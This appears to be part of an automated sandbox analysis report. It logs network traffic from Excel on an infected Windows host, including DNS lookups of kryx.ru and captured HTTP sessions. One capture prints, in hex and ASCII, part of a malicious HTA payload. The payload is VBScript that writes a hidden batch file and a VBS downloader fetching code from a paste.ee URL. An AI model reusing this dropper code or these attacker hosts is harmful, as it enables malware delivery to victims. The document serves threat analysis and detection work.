                                    Mar 17, 2025 09:43:19.222556114 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.222611904 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.222618103 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.222711086 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.222760916 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.222778082 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.222827911 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.222832918 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.222901106 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.222956896 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.222979069 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.223007917 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.223012924 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.223046064 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.223064899 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.223066092 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.223077059 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.223097086 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.223120928 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.223126888 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.223154068 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.223167896 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.223205090 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.223220110 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.223263025 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.223268986 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.223308086 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.228430033 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.228456974 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.228538990 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.228549004 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.228588104 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.312180996 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.312206030 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.312283993 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.312299967 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.312350035 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.312361002 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.312366962 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.312380075 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.312407970 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.312413931 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.312443972 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.312485933 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.312573910 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.312588930 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.312666893 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.312671900 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.312709093 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.312915087 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.312931061 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.312977076 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.312983036 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.313009024 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.313026905 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.313216925 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.313232899 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.313299894 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.313306093 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.313388109 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.313407898 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.313443899 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.313452959 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.313467026 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.313513994 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.313611031 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.313627005 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.313673973 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.313678980 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.313708067 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.313726902 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.319132090 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.319159031 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.319196939 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.319209099 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.319264889 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.402945042 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.402967930 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.403039932 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.403053045 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.403079033 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.403104067 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.403107882 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.403117895 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.403143883 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.403179884 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.403358936 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.403373957 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.403420925 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.403426886 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.403480053 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.403774977 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.403789997 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.403836012 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.403841019 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.403876066 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.403909922 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.403925896 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.403971910 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.403978109 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.404064894 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.404120922 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.404138088 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.404189110 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.404195070 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.404400110 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.404418945 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.404418945 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.404433012 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.404453993 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.404505014 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.409815073 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.409831047 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.409894943 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.409903049 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.409959078 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.493570089 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.493590117 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.493674040 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.493688107 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.493741989 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.493766069 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.493782043 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.493813038 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.493818998 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.493850946 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.493874073 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.494007111 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.494024038 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.494066954 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.494074106 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.494127989 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.494322062 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.494337082 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.494386911 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.494394064 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.494505882 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.494646072 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.494662046 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.494704962 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.494709969 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.494762897 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.494869947 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.494885921 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.494929075 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.494934082 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.494986057 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.495076895 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.495090961 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.495210886 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.495217085 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.495265007 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.500778913 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.500809908 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.500843048 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.500850916 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.500904083 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.584222078 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.584242105 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.584316969 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.584336042 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.584382057 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.584486961 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.584501028 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.584532022 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.584537983 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.584572077 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.584688902 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.584705114 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.584753036 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.584758043 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.584976912 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.584995985 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.585045099 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.585050106 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.585072041 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.585095882 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.585218906 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.585233927 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.585273981 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.585278988 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.585340977 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.585661888 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.585684061 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.585727930 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.585731983 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.585762024 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.585827112 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.585841894 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.585899115 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.585905075 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.585984945 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.591347933 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.591377020 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.591418028 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.591420889 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.591432095 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.591456890 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.591568947 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.591711044 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.591739893 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.591753006 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.591753006 CET58542443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:19.591762066 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:19.591768026 CET4435854213.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:24.074002028 CET58543443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:24.074067116 CET4435854313.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:24.074199915 CET58543443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:24.074460030 CET58543443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:24.074476957 CET4435854313.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:24.077063084 CET58544443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:24.077107906 CET4435854413.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:24.077286959 CET58544443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:24.077517033 CET58544443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:24.077529907 CET4435854413.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:24.758629084 CET4435854413.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:24.766192913 CET4435854313.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:24.796443939 CET58544443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:24.796479940 CET4435854413.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:24.798439026 CET58544443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:24.798453093 CET4435854413.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:24.811495066 CET58543443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:24.811515093 CET4435854313.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:24.816129923 CET58543443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:24.816145897 CET4435854313.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:24.906055927 CET4435854413.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:24.906080961 CET4435854413.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:24.906136036 CET58544443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:24.906169891 CET4435854413.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:24.906327963 CET4435854413.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:24.906416893 CET58544443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:24.925759077 CET4435854313.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:24.925844908 CET4435854313.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:24.925920010 CET58543443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:24.967164993 CET58544443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:24.967194080 CET4435854413.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:24.967216969 CET58544443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:24.967223883 CET4435854413.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:24.980504036 CET58543443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:24.980504036 CET58543443192.168.2.913.107.253.72
                                    Mar 17, 2025 09:43:24.980537891 CET4435854313.107.253.72192.168.2.9
                                    Mar 17, 2025 09:43:24.980549097 CET4435854313.107.253.72192.168.2.9
                                    Mar 17, 2025 09:44:01.465572119 CET5853980192.168.2.9198.12.89.24
                                    Mar 17, 2025 09:44:01.473100901 CET8058539198.12.89.24192.168.2.9
                                    TimestampSource PortDest PortSource IPDest IP
                                    Mar 17, 2025 09:42:22.741087914 CET53640631.1.1.1192.168.2.9
                                    Mar 17, 2025 09:43:02.916449070 CET6130053192.168.2.91.1.1.1
                                    Mar 17, 2025 09:43:03.016242027 CET53613001.1.1.1192.168.2.9
                                    Mar 17, 2025 09:43:17.783212900 CET5699153192.168.2.91.1.1.1
                                    Mar 17, 2025 09:43:17.873270035 CET53569911.1.1.1192.168.2.9

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Mar 17, 2025 09:43:02.916449070 CET192.168.2.91.1.1.10x62b2Standard query (0)kryx.ruA (IP address)IN (0x0001)false
                                    Mar 17, 2025 09:43:17.783212900 CET192.168.2.91.1.1.10x1952Standard query (0)otelrules.svc.static.microsoftA (IP address)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Mar 17, 2025 09:42:13.032041073 CET1.1.1.1192.168.2.90x926aNo error (0)ecs-office.s-0005.dual-s-msedge.netshed.s-0005.dual-s-dc-msedge.netCNAME (Canonical name)IN (0x0001)false
                                    Mar 17, 2025 09:42:13.032041073 CET1.1.1.1192.168.2.90x926aNo error (0)shed.s-0005.dual-s-dc-msedge.nets-0005.dual-s-dc-msedge.netCNAME (Canonical name)IN (0x0001)false
                                    Mar 17, 2025 09:42:13.032041073 CET1.1.1.1192.168.2.90x926aNo error (0)s-0005.dual-s-dc-msedge.net52.123.130.14A (IP address)IN (0x0001)false
                                    Mar 17, 2025 09:42:13.032041073 CET1.1.1.1192.168.2.90x926aNo error (0)s-0005.dual-s-dc-msedge.net52.123.131.14A (IP address)IN (0x0001)false
                                    Mar 17, 2025 09:42:14.222842932 CET1.1.1.1192.168.2.90xdaa7No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                    Mar 17, 2025 09:42:14.222842932 CET1.1.1.1192.168.2.90xdaa7No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                    Mar 17, 2025 09:43:03.016242027 CET1.1.1.1192.168.2.90x62b2No error (0)kryx.ru188.225.72.170A (IP address)IN (0x0001)false
                                    Mar 17, 2025 09:43:17.873270035 CET1.1.1.1192.168.2.90x1952No error (0)otelrules.svc.static.microsoftotelrules-bzhndjfje8dvh5fd.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                    Mar 17, 2025 09:43:17.873270035 CET1.1.1.1192.168.2.90x1952No error (0)otelrules-bzhndjfje8dvh5fd.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                    Mar 17, 2025 09:43:17.873270035 CET1.1.1.1192.168.2.90x1952No error (0)star-azurefd-prod.trafficmanager.netshed.dual-low.s-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                    Mar 17, 2025 09:43:17.873270035 CET1.1.1.1192.168.2.90x1952No error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                    Mar 17, 2025 09:43:17.873270035 CET1.1.1.1192.168.2.90x1952No error (0)azurefd-t-fb-prod.trafficmanager.netdual.s-part-0044.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                    Mar 17, 2025 09:43:17.873270035 CET1.1.1.1192.168.2.90x1952No error (0)dual.s-part-0044.t-0009.fb-t-msedge.nets-part-0044.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                    Mar 17, 2025 09:43:17.873270035 CET1.1.1.1192.168.2.90x1952No error (0)s-part-0044.t-0009.fb-t-msedge.net13.107.253.72A (IP address)IN (0x0001)false

                                    HTTP Request Dependency Graph

                                    • kryx.ru
                                    • otelrules.svc.static.microsoft
                                    • 198.12.89.24

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.958539198.12.89.24806968C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                    TimestampBytes transferredDirectionData
                                    Mar 17, 2025 09:43:04.035775900 CET266OUTGET /xampp/angel/cesgreatnessforentiretimegoodgirlsheis.hta?&balinese=stereotyped HTTP/1.1
                                    Accept: */*
                                    Accept-Encoding: gzip, deflate
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                    Connection: Keep-Alive
                                    Host: 198.12.89.24
                                    Mar 17, 2025 09:43:04.503024101 CET1236INHTTP/1.1 200 OK
                                    Date: Mon, 17 Mar 2025 08:43:04 GMT
                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                    Last-Modified: Mon, 17 Mar 2025 08:37:44 GMT
                                    ETag: "789-63085b3c0bdae"
                                    Accept-Ranges: bytes
                                    Content-Length: 1929
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                    Content-Type: application/hta
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 78 65 63 75 74 61 72 20 53 63 72 69 70 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 48 54 41 3a 41 50 50 4c 49 43 41 54 49 4f 4e 20 0d 0a 20 20 20 20 20 20 20 20 41 50 50 4c 49 43 41 54 49 4f 4e 4e 41 4d 45 3d 22 53 63 72 69 70 74 45 78 65 63 75 74 6f 72 22 0d 0a 20 20 20 20 20 20 20 20 42 4f 52 44 45 52 3d 22 6e 6f 6e 65 22 0d 0a 20 20 20 20 20 20 20 20 43 41 50 54 49 4f 4e 3d 22 6e 6f 22 0d 0a 20 20 20 20 20 20 20 20 53 48 4f 57 49 4e 54 41 53 4b 42 41 52 3d 22 6e 6f 22 0d 0a 20 20 20 20 20 20 20 20 53 49 4e 47 4c 45 49 4e 53 54 41 4e 43 45 3d 22 79 65 73 22 0d 0a 20 20 20 20 20 20 20 20 57 49 4e 44 4f 57 53 54 41 54 45 3d 22 6d 69 6e 69 6d 69 7a 65 22 0d 0a 20 20 20 20 2f 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 56 42 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 44 69 6d 20 70 61 6c 6d 61 72 69 75 6d 0d 0a 20 20 20 20 [TRUNCATED]
                                    Data Ascii: <!DOCTYPE html><html><head> <title>Executar Script</title> <HTA:APPLICATION APPLICATIONNAME="ScriptExecutor" BORDER="none" CAPTION="no" SHOWINTASKBAR="no" SINGLEINSTANCE="yes" WINDOWSTATE="minimize" /> <script language="VBScript"> Dim palmarium Set palmarium = CreateObject("WScript.Shell") Dim porogenic porogenic = "C:\Windows\Temp\serjeant.bat" Dim degradative, puckishly Set degradative = CreateObject("Scripting.FileSystemObject") Set puckishly = degradative.CreateTextFile(porogenic, True) puckishly.WriteLine "@echo off" puckishly.WriteLine "setlocal" puckishly.WriteLine "set ""fugues=C:\Windows\Temp\statcoulomb.vbs""" puckishly.WriteLine ">" & """%fugues%""" & " (" puckishly.WriteLine " ec
                                    Mar 17, 2025 09:43:04.503058910 CET1009INData Raw: 68 6f 20 44 69 6d 20 6e 6f 6e 63 61 74 61 6c 6f 67 2c 20 64 6f 63 75 6d 65 6e 74 61 72 69 73 74 22 0d 0a 20 20 20 20 20 20 20 20 70 75 63 6b 69 73 68 6c 79 2e 57 72 69 74 65 4c 69 6e 65 20 22 20 20 20 20 65 63 68 6f 20 6e 6f 6e 63 61 74 61 6c 6f
                                    Data Ascii: ho Dim noncatalog, documentarist" puckishly.WriteLine " echo noncatalog = ""https://paste.ee/d/JXMIrE0h/0""" puckishly.WriteLine " echo Set documentarist = CreateObject^(""MSXML2.XMLHTTP""^)" puckishly.WriteLin


                                    HTTPS Proxied Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.958538188.225.72.1704436968C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                    TimestampBytes transferredDirectionData
                                    2025-03-17 08:43:03 UTC232OUTGET /e3EPl0?&certification=exclusive&kitty=thinkable HTTP/1.1
                                    Accept: */*
                                    Accept-Encoding: gzip, deflate
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                    Host: kryx.ru
                                    Connection: Keep-Alive
                                    2025-03-17 08:43:04 UTC509INHTTP/1.1 302 Found
                                    Server: nginx/1.18.0 (Ubuntu)
                                    Date: Mon, 17 Mar 2025 08:43:03 GMT
                                    Content-Type: text/plain; charset=utf-8
                                    Content-Length: 118
                                    Connection: close
                                    X-DNS-Prefetch-Control: off
                                    X-Frame-Options: SAMEORIGIN
                                    Strict-Transport-Security: max-age=15552000; includeSubDomains
                                    X-Download-Options: noopen
                                    X-Content-Type-Options: nosniff
